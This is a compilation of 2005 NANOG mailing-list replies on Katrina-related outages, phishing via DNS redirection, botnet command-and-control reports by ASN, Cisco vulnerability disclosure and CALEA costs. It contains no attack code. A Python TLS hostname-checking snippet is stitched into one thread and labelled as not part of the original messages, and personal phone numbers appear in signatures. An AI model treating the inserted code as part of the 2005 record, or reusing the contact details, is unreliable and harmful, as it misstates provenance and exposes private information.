If need be I'll off shore it. Matt Fine, you can build it and off-shore it, but I suspect that is a case of if you build it they will not come. Robbing points from each other at the deal desk has 0 value to all of us. It also has 0 operational value. Ultimately, the smaller guys would suffer as a result anyhow. The more points beaten down at the top, the more pressure to not discount at the higher margins. [end] -M I think that people have made it fairly clear that this is a bad idea, but I don't think that anyone is going to stop you building it. I am guessing that you will 1) get inflated prices because the people who are getting the really good discounts are going to be the ones with the most to lose personally and 2) lots of happy shiny letters from vendors' lawyers asking you for logs. Whether or not you have logs is largely irrelevant, you will still get the letters. I don't know about you, but I have better things to do than a: unnecessarily antagonize the same people that you presumably want to get a good discount from and b: collect subpoenas. Warren. -- Build a man a fire, and he'll be warm for a day. Set a man on fire, and he'll be warm for the rest of his life. -- Terry Pratchett
RE: Computer systems blamed for feeble hurricane response?
http://www.fema.gov/staff/extended.jsp Lists an IT Services Division that has ~250 possible points of contact. Surely one of them has some clue... :-/ I think this sort of problem shows the endemic disease currently in place at FEMA. It's not just an IT gaffe or firewall mistake. It's a failure much more serious, sadly. ObOp: Email is NOT a reliable form of communication. DHS shouldn't start to think so either. NANOG shouldn't worry about if someone's email is working as a byproduct, but sure worry if the store and forward function of an ISP is. Anything below that is the individual SP's problem, IMO. Perhaps there are reasons some corporate or volunteer mail service is not working i.e. blocked, disallowed on port, etc. ObNotOp: Anyone who needs to contact FEMA, already knows how. If they are using a web page address, they probably shouldn't be contacting FEMA directly, but working through their own government hierarchy.
RE: CAT5 surge/lightning strike protection recommendations?
Anyone have recommendations (tested/practical is best :-)? The APC Protectnet PNET1 and PRM24 seem quite nice and not too expensive -- if they work... pros? cons? It sounds like you're either out of NEC, or, you are grounding them to waterpipe. I believe NEC calls for grounding via earth. You could strike some rod into the ground several feet deep, attach to the pipe with conductive screw+locknut+washer, and a proper gauge for distance cable. Theoretically, that should solve your problem. What did your electricians say? -M
RE: mail service with no mx (was - Re: Computer systems blamed for feeble hurricane response?)
Application layer firewalls have existed for at least 6 years. Make that 15 Socks, fwtk (before it went commercial) to name a few. -M
RE: www.usenetabuse.com?
I haven't run a large usenet server in a while, but, anyone asking for your phone number related to a usenet complaint has a whole lot of time on their hands. Wait for Supernews to chime in. Martin -Original Message- From: Howard C. Berkowitz [mailto:[EMAIL PROTECTED]] Sent: Sat Sep 10 21:51:47 2005 To: nanog@merit.edu Subject: www.usenetabuse.com? I'm assisting in trying to deal with a group of flooders/trolls. One remailer directs complaints to www.usenetabuse.com. Does anyone know if this is a legitimate anonymizer abuse desk, or phishing for details of exploits?
RE: UNITED.COM (United Airlines) has been down for days! Any info on this?
United.COM works from everywhere I try it. MCI, ATT, Internap, and Sprint. I can run tickets, check miles, and check my dining points. Since I started the thread a month ago... it seemed to me that the problem(s) are intermittent and not always repeatable :( I was able to see some very odd things in the dns resolution area for their site(s), which others had confirmed being problematic over the last few months as well. You started this? Thanks. I love IKYABWAI threads. :-) I'd think that last night's 'problem' was just another recurrence of the same set of problems :( Maybe someone at Internap could tell them/ask them what's going on?
RE: FW: Need some help: IDEAS, Inc.
this is NOT a good solution, since a successful phish attack in this case would look exactly like the official red cross web site. How's that one work? -M
RE: UNITED.COM (United Airlines) has been down for days! Any info on this?
Nice try, but the location that I was trying from did not use alternative root servers. FYI: They are Inclusive Namespace Servers. United.COM works from everywhere I try it. MCI, ATT, Internap, and Sprint. I can run tickets, check miles, and check my dining points. Currently linked via United News: The aftermath of Hurricane Katrina is still causing cancellations and some flight irregularities. Check the status of your flight before traveling and read on for information about changing travel plans affected by the weather. We are attempting to recover to full operations as quickly as possible. Sounds like a local issue. -M
RE: FW: Need some help: IDEAS, Inc.
this is NOT a good solution, since a successful phish attack in this case would look exactly like the official red cross web site. How's that one work? One form of DirectNIC's redirection, which the phisher was supposedly using (I didn't check myself), uses a FRAMESET to hide the redirect inside a frame, thereby not showing the real address in the browser without deeper inspection. Understood. If it's being pointed at redcross.org, a known good guy site, that wouldn't be a problem, would it? It seems that if the scammer is removed from the operation, it's not really a problem anymore. I'm interested because I think there could be value in a page(s) on an SP that says This site terminated due to fraudulent activity and pointers to how to not be sucked into these things. Personally, I'd prefer registrar lock myself, as that keeps the distinction between scam and non-scam clear. Registrar lock is preferred on my part. The redirect idea was creative. -M
RE: Tidbit from DirectNIC
If you need a raft as a supply in a datacenter there's obviously a bigger issue at hand and it's unlikely you'll have many of us as customers. What have you done to help the situation in New Orleans? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Fri Sep 02 11:45:39 2005 To: nanog@merit.edu Subject: Tidbit from DirectNIC From downtown New Orleans... http://www.livejournal.com/users/interdictor/ -snip- Fox News is reporting that there is an operation underway to refill chillers at the Bell South building down the street to keep phone service available to much of the southeast United States. That is apparently where all the firetrucks are going to in the area, in case you were wondering. -snip- It is interesting to note that it is possible to bring in diesel and water to resupply BellSouth yet it is impossible to bring in water and food for the residents, not to mention a fleet of small boats that could have prevented thousands from dying trapped inside their attics. If you have a datacenter in a location that might be flooded by rivers or storm surges, do you have inflatable rafts among your emergency supplies? --Michael Dillon
RE: trying to move web site for New Orleans schools
Outside the NANOG charter, but given the current circumstances, this seemed to be a reasonable forum for suggestions on solving this problem. I suggest everyone move with caution on making any unauthenticated changes on the fly for anyone claiming to be impacted by the storm. I know we all feel badly, but this is a good opportunity for miscreants, phishers, and scammers to wreak havoc. -M
RE: Bell South or Telcove help needed in NOLA
If anyone who works for or has connections with Bell South or Telcove is reading this, tell us what it's going to take to get those OC3s back up and running. We will try to coordinate and make it happen. If I were DirectNIC, I'd be making arrangements to operate from a place other than New Orleans for the time being. -M
RE: redcross.org certificate problems with Akamai
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Jay R. Ashworth Sent: Thursday, September 01, 2005 3:12 PM To: nanog@merit.edu Subject: Ops: redcross.org certificate problems with Akamai The donations page is Akamaized, and the certificate says a248.e.akamai.net instead of www.redcross.org. I have the certificate signature available off-line. Which part of the transaction does this occur at? Do you have a specific URL? All of the VeriSign security seals are reporting known and trusted host and the certs are matching. They appear to be outsourcing their payment processing to Convio. It's all matching up. -M
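The mismatch reported above (a certificate naming a248.e.akamai.net presented for www.redcross.org) is exactly what a TLS client's hostname check rejects. This is an added example, not part of the original messages: a small RFC 6125-style matcher; the function names and the example.org names are constructed for illustration, and only the two host names from the report come from the thread.

```python
def _labels(name):
    """Split a DNS name into lower-cased labels, ignoring a trailing dot."""
    return name.rstrip(".").lower().split(".")


def name_matches(pattern, hostname):
    """True if one certificate DNS name matches the requested hostname.

    A '*' is honoured only as the whole left-most label, stands for exactly
    one label, and must be followed by at least two fixed labels.
    """
    p, h = _labels(pattern), _labels(hostname)
    if len(p) != len(h) or "" in p or "" in h:
        return False
    if any("*" in label for label in p[1:]):
        return False                      # wildcard outside the left-most label
    if p[0] == "*":
        return len(p) >= 3 and p[1:] == h[1:]
    if "*" in p[0]:
        return False                      # partial wildcard such as "w*"
    return p == h


def verify_hostname(cert_dns_names, hostname):
    """Return (ok, reason) for a requested hostname against a certificate's names."""
    if not cert_dns_names:
        return (False, "certificate carries no DNS names")
    for name in cert_dns_names:
        if name_matches(name, hostname):
            return (True, f"matched {name}")
    return (False, f"{hostname} is not among {cert_dns_names}")


if __name__ == "__main__":
    # Names as described in the report: CDN certificate, customer hostname.
    print(verify_hostname(["a248.e.akamai.net"], "www.redcross.org"))
    # Same certificate reached under the CDN's own name verifies.
    print(verify_hostname(["a248.e.akamai.net"], "a248.e.akamai.net"))
    # Constructed wildcard cases.
    print(verify_hostname(["*.example.org"], "www.example.org"))
    print(verify_hostname(["*.example.org"], "pay.www.example.org"))
```
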
RE: August 2005: Drone Army Botnet CC listing
30058 FDCSERVERS - FDCservers.net LL 123 43 21840 SAGONET-TPA - Sago Networks 53 26 Much better. And no IL-CERT. :-) Is it safe to say the resolutions, at least in these two cases, are because of others mitigation activities i.e. snatching back the RR's, shutting off the domain, black holes, etc? -M
Martial Law declared in New Orleans Was: RE: Katrina could inundate New Orleans
Breaking news... Apparently a 200 foot section of levee broke last night and is gradually burying the city. Martial Law has been declared in the area as well. Overnight Levee Break: http://www.theadvertiser.com/apps/pbcs.dll/article?AID=/20050830/NEWS05/50830005 Martial Law: http://jurist.law.pitt.edu/paperchase/2005/08/breaking-news-martial-law-declared-in.php -- Martin Hannigan (c) 617-388-2663 VeriSign, Inc. (w) 703-948-7018 Network Engineer IV Operations Infrastructure [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Matthew Kaufman Sent: Monday, August 29, 2005 11:47 AM To: nanog@merit.edu Subject: RE: Katrina could inundate New Orleans Dave Stewart: Y'know... I do have to wonder whether Internet access is nearly as important as power and communications (traditional comms, such as the PSTN). Granted, it'll be interesting to see how things shake out - but I just can't buy that getting the Internet working should/will be a really high priority. Back when I was running ISPs, we had several county and city Emergency Operations Centers as customers... Either on T1 or frame relay for their primary service, or as their backup dial-on-demand ISDN provider. These connections were how the EOC got river gauge data for planning flood evacuations (at the time, no other source other than having the numbers read off from the state-level agency office over the phone if they weren't too busy), USGS earthquake epicenter (also available over EDIS) and shake map (Internet only) data, weather service radar and satellite images (backup was TV broadcasts, if still on the air), and in some counties, the only access to the hospital emergency room status tracking system used for multi-casualty incidents... 
While there's more private data networks online now, there's also more Internet-available data that the EOCs would like to have access to, I'm sure (I know that some cities are using Internet-connected webcams to do security monitoring, look at shorelines, etc.) In many incident scenarios (and a few actual incidents), the priority was that the radio system stayed up, then Internet access, *then* PSTN (and having cellphone access to people in the field to supplement the radio system was more important than landline calls to anywhere else). And power, of course, is easily generated locally, so not a big priority at all. Interestingly, almost none of the agencies told sales what the connection was going to be used for... Only when engineering made a followup inquiry would we learn that, yes, in an emergency, they'd like theirs fixed first please, and yes, they'd need first dibs on the backup power if we didn't have enough to run everything. Matthew Kaufman [EMAIL PROTECTED]
RE: Arbor's technical support contact?
How can I contact Arbor's technical support engineer? http://www.arbornetworks.com/products_support.php
RE: Katrina could inundate New Orleans
http://hosted.ap.org/dynamic/stories/K/KATRINA_THE_BIG_ONE_LAO L-?SITE=LABATSECTION=HOMETEMPLATE=DEFAULT Looks like the major hit to occur between 7A/11A Eastern. http://www.weatherstreet.com/CloudsPrecip.htm# -M
RE: Katrina could inundate New Orleans
This post is very OT, but I think events warrant the protocol violation this time. If you're in New Orleans, I'm sure the health of the local internet infrastructure becomes secondary to getting your ass above sea level... Some of this is on topic. Internet access is as important as the lights or water being on. Right, get out, but it'll be good to see reasonable updates on what's going on utilities wise down there when the weather shifts. -M
Re: Blocking certain terrorism/porn sites and DNS
Since when is Internet email reliable? -Original Message- From: J. Oquendo [mailto:[EMAIL PROTECTED]] Sent: Thu Aug 18 14:38:31 2005 To: [EMAIL PROTECTED] Cc: William Allen Simpson Subject: Re: Blocking certain terrorism/porn sites and DNS On Thu, 18 Aug 2005, William Allen Simpson wrote: Apparently, you did Of course, repeated posting here will vastly improve your opportunity to examine binaries handily delivered directly to your own email box. ;-) handily delivered directly to your own email box. I take note of your own email box. So again I ask, how do you propose dealing with mail that was handily delivered to your clients' email boxes. Or would you just be assuming if test -f LOOKS_LIKE_MY_EMAIL then filter_that. Either way you want to cut your comment it would take a bit of snooping to parse out traffic not destined to your own email box(es). So what do you tell your customer Oh by the way we had to snoop in on your sessions to stop some new and improved MS uberworm. If so, when do you do it, when your network is crawling, after the fact... What if you're off by one and accidentally filter out say a contract worth a lot. Again, if I'm missing something by all means e-smack me. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo GPG Key ID 0x97B43D89 http://pgp.mit.edu:11371/pks/lookup?op=get=0x97B43D89 To conquer the enemy without resorting to war is the most desirable. The highest form of generalship is to conquer the enemy by strategy. - Sun Tzu
RE: drone armies CC report - July/2005
Wall of sheep certainly is humorous, but IL CERT using this data as a shaming mechanism is, well, a shame. Why you associate IL CERT with this is confusing to others. I am confident that you know there is little or no connection. We all have employers. You, me and Gadi included. ;-) I don't know that. I am not part of the project. It was sent from cert.gov.il and had a sig from the manager of the IL CERT. We can go around in circles all day on this, but it seems that the IL CERT was used to give the report credibility so it's fair to give feedback on it as official CERT policy, IMO. nothing actionable Enough said. -M
RE: drone armies CC report - July/2005
[ SNIP ] Below is a periodic public report from the drone armies / botnets research and mitigation mailing list. For this report it should be noted that we base our analysis on the data we have accumulated from various sources. According to our incomplete analysis of information we have Serious question. Is this self promotion of IL CERT? -M
RE: drone armies CC report - July/2005
The question of self promotion came back split down the middle. It was noted that IL CERT does a fantastic job seeing that there are no IL networks listed. Or none that are easily identifiable. YMMV. -M -- Martin Hannigan (c) 617-388-2663 VeriSign, Inc. (w) 703-948-7018 Network Engineer IV Operations Infrastructure [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Gadi Evron Sent: Monday, August 15, 2005 8:22 AM To: nanog@merit.edu Subject: drone armies CC report - July/2005 Below is a periodic public report from the drone armies / botnets research and mitigation mailing list. For this report it should be noted that we base our analysis on the data we have accumulated from various sources. According to our incomplete analysis of information we have thus far, we now publish our regular reports, with some additional information. As of this month, any responsible party that wishes to receive information about botnet CC's in their net space can contact us and be added to our notification list. This month's survey is of 3629 unique domain with port or IP with port suspect CCs. This list is extracted from the BBL which currently has a historical base of 4464 reported CCs. Of the suspect CCs surveyed, 920 reported as Open, 3115 reported as closed and 393 issued resets to the survey instrument. Of the CCs listed by domain name, 2080 are mitigated via remapping. 276 ASNs report one or more open CCs. 
ASNs with 10 or more unresolved and open suspect CCs:

ASNumber  Responsible Party               Count  Open/Unresolved
21840     SAGONET-TPA - Sago Networks        53  34
30058     FDCSERVERS - FDCservers.net LL     65  32
30083     SERVER4YOU - Server4You Inc.       41  28
12832     LYCOS-EUROPE Lycos Europe GmbH     31  27
23522     CIT-FOONET - CREATIVE INTERNET     25  23
174       COGENT Cogent/PSI                  45  23
13680     AS13680 Hostway Corporation Ta     22  22
6461      MFNX MFN - Metromedia Fiber Ne     23  18
27595     ATRIVO-AS - Atrivo                 27  16
15083     INFOLINK-MIA-US - Infolink Inf     19  15
4766      KIXS-AS-KR Korea Telecom           41  15
8560      SCHLUND-AS Schlund + Partner A     28  14
27645     ASN-NA-MSG-01 - Managed Soluti     19  12
13237     LAMBDANET-AS European Backbone     15  12
1113      TUGNET Technische Universitaet     12  11
13301     UNITEDCOLO-AS Autonomous Syste     16  11
6939      HURRICANE - Hurricane Electric     12  10
16265     LEASEWEB LEASEWEB AS               13  10
21698     NEBRIX-CA - Nebrix Communicati     25  10

Top 10 ASNs by total count:

ASNumber  Responsible Party               Count  Open/Unresolved
14742     INTERNAP-BLOCK-4 - Internap Ne    118  1
14744     INTERNAP-BLOCK-4 - Internap Ne    118  1
25761     STAMINUS-COMM - Staminus Commu     69  25
10913     INTERNAP-BLK - Internap Networ     67  1
30058     FDCSERVERS - FDCservers.net LL     65  32
21840     SAGONET-TPA - Sago Networks        53  34
174       COGENT Cogent/PSI                  45  23
4766      KIXS-AS-KR Korea Telecom           41  15
30083     SERVER4YOU - Server4You Inc.       41  28
3356      LEVEL3 Level 3 Communications      37  2

ASNs with one or more open CCs: ASNumber Responsible Party 81 CONCERT - MCNC Center of Commu 174 COGENT Cogent/PSI 237 MERIT-AS-14 - Merit Network In 701 ALTERNET-AS - UUNET Technologi 790 EUNETFI EUnet Finland 813 UUNET-AS1 - UUNET Technologies 1113 TUGNET Technische Universitaet 1221 ASN-TELSTRA Telstra Pty Ltd 1239 SPRINTLINK - Sprint 1267 ASN-INFOSTRADA Infostrada S.p. 1659 ERX-TANET-ASN1 Tiawan Academic 1668 AOL-ATDN - AOL Transit Data Ne 1784 GNAPS - Global NAPs Networks 1785 USLEC-ASN-1785 - USLEC Corp. 
1955 HBONE-AS HUNGARNET 2042 ERX-JARING Malaysian institute 2108 CARNET-AS Croatian Academic an 2119 TELENOR-NEXTEL Telenor Interne 2501 JPNIC-ASBLOCK-AP JPNIC 2514 JPNIC-ASBLOCK-AP JPNIC 2527 JPNIC-ASBLOCK-AP JPNIC 2828 XO-AS15 - XO Communications 2856 BT-UK-AS BTnet UK Regional net 2907 ERX-SINET-AS National Center f 2914 VERIO - Verio Inc. 3064 AFFINITY-FTL - Affinity Intern 3215 AS3215 France Telecom Transpac 3246 TDCSONG TDC Song 3248 SIL-AT SILVER:SERVER GmbH 3265 XS4ALL-NL XS4ALL 3292 TDC TDC Data Networks 3301 TELIANET-SWEDEN TeliaNet Swede 3307 BANETELE-NORWAY BaneTele AS (f 3313 INET-AS I.NET S.p.A. 3344 KEWLIO-DOT-NET Kewlio.net Limi 3352 TELEFONICA-DATA-ESPANA Interne 3356 LEVEL3 Level 3 Communications 3462 HINET Data Communication Busin 3491 BTN-ASN -
RE: drone armies CC report - July/2005
Going further I think IL-CERT is doing a great service to the Internet community. Their alerts allow responsible network admins to investigate and to preserve their networks clean of debris like spyware and trojans. The point is that aged data is an eternity when you're talking about botnets, worms, zombies, c/c's, etc which is what made me wonder why it was being posted in the first step. A month is a long time in botland. Yes, I'm all for clean networks. Yes, IL CERT does as good a job as any CERT, I'm sure. -M
RE: drone armies CC report - July/2005
the summaries are primarily useful for CC's that are still alive a month later even though plenty of notices have been sent to the relevant NOC's. in other words it's sort of like defcon's wall of sheep. i like the approach. Wall of sheep certainly is humorous, but IL CERT using this data as a shaming mechanism is, well, a shame. Once the NOC engages in an exercise of futility based on that list, it will never be read again and the effort ends up being more futile, which is another shame. It's a good project, but it got ripe before it was ready, IMO. BTW, are you vouching for the report?
Re: botnet reporting by AS - what about you?
Translation: This isn't a contact list for hundreds of asn's. -Original Message- From: Gadi Evron [mailto:[EMAIL PROTECTED]] Sent: Fri Aug 12 22:43:47 2005 To: Richard A Steenbergen Cc: nanog list Subject: Re: botnet reporting by AS - what about you? What happened to replies off-list? Anyway, good point about actual ASN's, so here goes. Do you mean to tell me you can't find contact info for ANY of those ISPs on your own (like those ALTERNET guys, they're hard to track down)? Are you trying to start a service for notifying ISPs when they have drones behind them or something? Surely you don't expect to obtain a comprehensive list by posting a list of AS names and half chopped off descriptions to NANOG, without even including the AS numbers? We have contacts and listing, but we are trying to re-build, update and cover everything. New list with AS numbers below, as requested. If your AS is not listed and you are interested, drop me a note. I'd personally love more reporting services that will actually disclose information to the ISPs who can actually take action to help straighten out their customers. We have far too many people who sit around wringing their hands about how horrible the botnets are, but who won't tell anyone who can do anything about it out of a paranoid sense of security. I'm not sure this is the best way to go about that though. :) We are open for suggestions and this is not the *only* course of action we take. :) Thanks, Gadi. 
17 PURDUE - Purdue University 25 UCB - University of California 27 UMDNET - University of Marylan 81 CONCERT - MCNC Center of Commu 137 ASGARR GARR Italian academic a 174 COGENT Cogent/PSI 209 ASN-QWEST - Qwest 210 WEST-NET-WEST - Utah Education 217 UMN-AGS-NET-AS - University of 224 UNINETT UNINETT The Norwegian 237 MERIT-AS-14 - Merit Network In 239 UTORONTO-AS - University of To 286 KPN KPN Internet Backbone AS 376 RISQ-AS - Reseau Interordinate 553 BELWUE Landeshochschulnetz Bad 577 BACOM - Bell Advanced Communic 680 DFN-IP service G-WiN 701 ALTERNET-AS - UUNET Technologi 702 AS702 MCI EMEA - Commercial IP 721 DLA-ASNBLOCK-AS - DoD Network 766 REDIRIS RedIRIS Autonomous Sys 786 JANET The JANET IP Service 790 EUNETFI EUnet Finland 812 ROGERS-CABLE - Rogers Cable In 813 UUNET-AS1 - UUNET Technologies 852 ASN852 - Telus Advanced Commun 1109 University of Salzburg 1113 TUGNET Technische Universitaet 1221 ASN-TELSTRA Telstra Pty Ltd 1239 SPRINTLINK - Sprint 1249 FIVE-COLLEGES-AS - Five Colleg 1267 ASN-INFOSTRADA Infostrada S.p. 1653 SUNET SUNET Swedish University 1659 ERX-TANET-ASN1 Tiawan Academic 1668 AOL-ATDN - AOL Transit Data Ne 1680 NetVision Ltd. 1767 IHETSDATANET - Indiana Higher 1781 KAIST-DAEJEON-AS-KR Korea Adva 1784 GNAPS - Global NAPs Networks 1785 USLEC-ASN-1785 - USLEC Corp. 1955 HBONE-AS HUNGARNET 2042 ERX-JARING Malaysian institute 2108 CARNET-AS Croatian Academic an 2116 ASN-CATCHCOM Catch Communicati 2119 TELENOR-NEXTEL Telenor Interne 2259 FR-U-STRASBOURG FR 2381 WISCNET1-AS - University of Wi 2501 JPNIC-ASBLOCK-AP JPNIC 2514 JPNIC-ASBLOCK-AP JPNIC 2527 JPNIC-ASBLOCK-AP JPNIC 2614 ROEDUNET Romanian Education Ne 2637 GEORGIA-TECH - Georgia Institu 2764 AAPT AAPT Limited 2828 XO-AS15 - XO Communications 2852 CESNET2 Czech National Researc 2856 BT-UK-AS BTnet UK Regional net 2907 ERX-SINET-AS National Center f 2914 VERIO - Verio Inc. 
3064 AFFINITY-FTL - Affinity Intern 3112 OARNET-AS-1 - OARnet 3212 TRIERA Triera Internet 3215 AS3215 France Telecom Transpac 3240 SEKTORNET Sektornet DK Minist 3246 TDCSONG TDC Song 3248 SIL-AT SILVER:SERVER GmbH 3257 TISCALI-BACKBONE Tiscali Intl 3265 XS4ALL-NL XS4ALL 3269 ASN-IBSNAZ TELECOM ITALIA 3292 TDC TDC Data Networks 3301 TELIANET-SWEDEN TeliaNet Swede 3304 SCARLET Scarlet Belgium 3307 BANETELE-NORWAY BaneTele AS (f 3313 INET-AS I.NET S.p.A. 3320 DTAG Deutsche Telekom AG 3323 NTUA National Technical Univer 3344 KEWLIO-DOT-NET Kewlio.net Limi 3352 TELEFONICA-DATA-ESPANA Interne 3356 LEVEL3 Level 3 Communications 3462 HINET Data Communication Busin 3491 BTN-ASN - Beyond The Network A 3561 SAVVIS - Savvis 3602 SPRINT-CA-AS - Sprint Canada I 3659 CLAREMONT - The Claremont Coll 3701 NERONET - Oregon Joint Graduat 3741 AFRINIC African Network Inform 3758 ERX-SINGNET SingNet 3786 ERX-DACOMNET DACOM Corporation 3801 MISNET - Mikrotec Internet Ser 4134 CHINANET-BACKBONE No.31 Jin-ro 4148 ACTCOM ACTCOM - Active Communi 4230 Embratel 4314 I-55-INTERNET-SERVICES-INC - I 4323 TWTC - Time Warner Telecom 4355 ERMS-EARTHLNK - EARTHLINK INC 4364 IGLOU - IgLou Internet Service 4436 AS-NLAYER - nLayer Communicati 4513 Globix Corporation 4589 EASYNET Easynet Group Plc 4618 INET-TH-AS Internet Thailand C 4628 ASN-PACIFIC-INTERNET-IX Pacifi 4637 REACH Reach Network Border AS 4645 ASN-HKNET-AP HKNet Co. Ltd 4670 HYUNDAI-KR Shinbiro 4685 ASAHI-NET Asahi Net 4713 OCN NTT Communications Corpora 4725 ODN JAPAN TELECOM CO. LTD. 4732 DION KDDI
Re: botnet reporting by AS - what about you?
I was on it and unsubscribed. They wouldn't disclose the collection or validation process at that time. This made it useless for the most part as it's hard to act on someone's word without some idea of how they are getting their data and avoiding collateral damage. I'm not saying there aren't valid zombies on it, but my criteria for a list that identifies rogues includes trust. I have lists I felt were more trustworthy than DA. Things may have changed. Martin -Original Message- From: Christopher L. Morrow [mailto:[EMAIL PROTECTED]] Sent: Fri Aug 12 23:56:53 2005 To: Fergie (Paul Ferguson) Cc: nanog@merit.edu Subject: Re: botnet reporting by AS - what about you? On Sat, 13 Aug 2005, Fergie (Paul Ferguson) wrote: Chris, I can assure you that the Drone Army project is not run that way, and is quite useful, effective, etc. The folks behind the DA Project are certainly professionals... ...and the information is quite useable, parse-able, and genuine. cool, among the 800k+ complaints we see a month (yes, 800k) there are quite a few completely useless ones :( Anything sent in as a complaint has to have complete and useful information, else it's hard/impossible to action properly. It'd help if the format it was sent in was also machine parseable :) With 800k+ complaints/month I'm not sure people want to spend time figuring each one out, a script/machine should be doing as much as possible. - ferg -- Christopher L. Morrow [EMAIL PROTECTED] wrote: perhaps we could back up and ask: 1) why are you not using the arin/ripe/apnic/japnic/krnic/lacnic poc's for these asn's? certainly some are not up to date, but there are a large number that are... 2) what is this for again? 3) are you planning on sending something to these poc's? 4) what are you planning on sending to them? 5) how often should they expect to see something, and from 'whom'? 
6) looked at the INCH working group in IETF, thought about using some of these evolving standards for your alerts/messages/missives? 7) please don't send in bmp files of traceroutes (make the info you send in complete and usable... 'I saw a bot on ip 12' is not useable, as an fyi) -Chris -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet [EMAIL PROTECTED] or [EMAIL PROTECTED] ferg's tech blog: http://fergdawg.blogspot.com/
RE: Cisco crapaganda
[ SNIP ] But I found more. It seems that a guy using the name FX has been publishing stuff about Cisco heap exploits for years now. I found his slides from a presentation made at BlackHat Las Vegas in 2002. Lots of juicy detail. And I found a long document translated from Chinese about modern information/economic warfare. If people want to be up to date, imagine the unimaginable. -M
RE: FCC Issues Rule Allowing FBI to Dictate Wiretap-Friendly Design for In ternet Services
I think the EFF is missing the important part of the wish list items. The punch list is law. If you are talking about the applicability of CALEA, that's different. The wish list items aren't for wiretaps, but defining as many things as possible as non-content. It's important for network operators because they will end up doing a lot more work digging through packets for non-content information, and important for lawyers because it lessens the legal requirements for non-content information. What is the expectation of privacy of non-content information? ObNANOG: Architecture, operation, cost. CALEA doesn't dictate architecture. Political issues aside, and attempting to stick with operations as this is NANOG, the major issue for carriers regardless of size is that compliance is an expense. The cost of an implementation for a medium sized carrier is upwards of 1MM. Maintenance runs at ~200K per year for a similar installation not coupling in legal and operations costs. That is IF you even get an order. The brunt of the work is at the tier1's. This is like DDOS. LEC's have to do it, but they frequently misinterpret the requirements and scale and end up spending money they never had to. Misinterpretation is a big problem for CALEA, technically speaking. -M
RE: FCC Issues Rule Allowing FBI to Dictate Wiretap-Friendly Design for Internet Services
On Sat, 6 Aug 2005, Matt Ghali wrote: On Sat, 6 Aug 2005, Joshua Brady wrote: the FBI can call the NSA anytime they want without a tap order and get them to trigger ECHELON when your voice is apparent on any line. Not me, I wrapped my cellphone in tin foil. shiny side out one hopes? Seriously though, I'm not a telco/phone person, but I was once told that the phone switch equipment does the tap 'automagically' to special ds-1 facilities in LEA-land... which means the cell phone can be wrapped in anything you'd like. If the calls get completed a copy is silently made to the right folks (not the nsa, they aren't LEA). Sort of. It has to be provisioned like any other service, (that's most of the X.25 portion that people were talking about) but it's a protocol(J-STD) enabled between the carrier and the LEA. It can be DS1, or it could be VPN. The capture is near real time content and data. -M
RE: DACS Equipment
I have a number of mux DS-3s coming in - right now they drop straight into aggregation routers. What I like to do is drop them into a local DACS and comb them out to DS-1s and then re-mux them back on to internal DS-3s. This will let me move circuits around digitally inside our equipment. You're looking for digital cross connect, for the most part. You should take a look at the Cisco line i.e. 15454 et. al. You can bring in ds3, groom on the backplane, and send out ds3. I've used the 15454 et. al. in production and for your stated purpose it's more economical than buying some big iron. You may also want to consider your physical layer architecture if you do this i.e. interconnecting vs. cross connecting so that you have test access where you need it. IIRC, the 15454 et. al. will do passive monitoring at a line level and will SNMP alert on outages down to the smallest mux' unit. Very nice for the IP NOC. -M
RE: OT: Cisco.com password reset.
Now imagine if instead of 2655 users it was 1-1.5million, Sure, 1.5MM. That's a lot. Don't get owned in the first place. Today's CSCO market cap is 124.0B. This is not our problem. -M
RE: Cisco IOS Exploit Cover Up
For those who like to keep abreast of security issues, there are interesting developments happening at BlackHat with regards to Cisco IOS and its vulnerability to arbitrary code executions. I apologize for the article itself being brief and lean on technical details, but allow me to say that it does represent a real problem (as in practical and confirmed): http://blogs.washingtonpost.com/securityfix/2005/07/mending_a_hole_.html Yes, practical _and_ confirmed, but you'll never get $vendor to admit it, which is the problem to begin with. -M
RE: Cisco IOS Exploit Cover Up
..and of course: Cisco Denies Router Vulnerability Claims [snip] Of course. That's how a broken vuln system works. :-) The major flaw is that the vendor decides who gets to know about a vulnerability. This causes an insecurity in the system because $vendor is dealing with people usually more qualified than themselves to make a decision on who needs to know and make one independent of revenue-- . $vendor is probably not the best person to decide who gets on the secret-15 lists et. al. -M
RE: compromized host list available
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Rick Wesson Sent: Wednesday, July 20, 2005 7:32 PM To: nanog@merit.edu Subject: compromized host list available Folks, I've developed a tool to pull together a bunch of information from DNSRBLs and mix it with a BGP feed, the result is that upon request I can generate a report of all the compromised hosts on your network as seen by various DNSRBLs. reports are available daily in pdf, text, csv, and excel. they are all a bit chunky but should be helpful. contact me off list, if you would like to get a daily report for your ASN. You will be required to prove you are associated with and responsible for the ASN you want a report for. The reports are free so this isn't a commercial =) honestly I hope the stuff helps. What about collateral damage? -M
RE: London incidents
All this while I was trying unsuccessfully to use my mobile to ring the office. Some cell relays were temporarily shut to prevent a remote detonation of additional explosives. Cellular remotes seem to be a favorite of Al Qaeda and others. -M
RE: SORBS deaggregation
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of David Barak Sent: Wednesday, July 06, 2005 6:51 PM To: nanog@merit.edu Subject: SORBS deaggregation --- Alex Rubenstein [EMAIL PROTECTED] wrote: [ SNIP ] I would've made this a private note to y'all except: Would you mind using Was: if you're going to change the subject? I'd appreciate it. I bet others would too... Hint: killfiles. -M
RE: Enable BIND cache server to resolve chinese domain name?
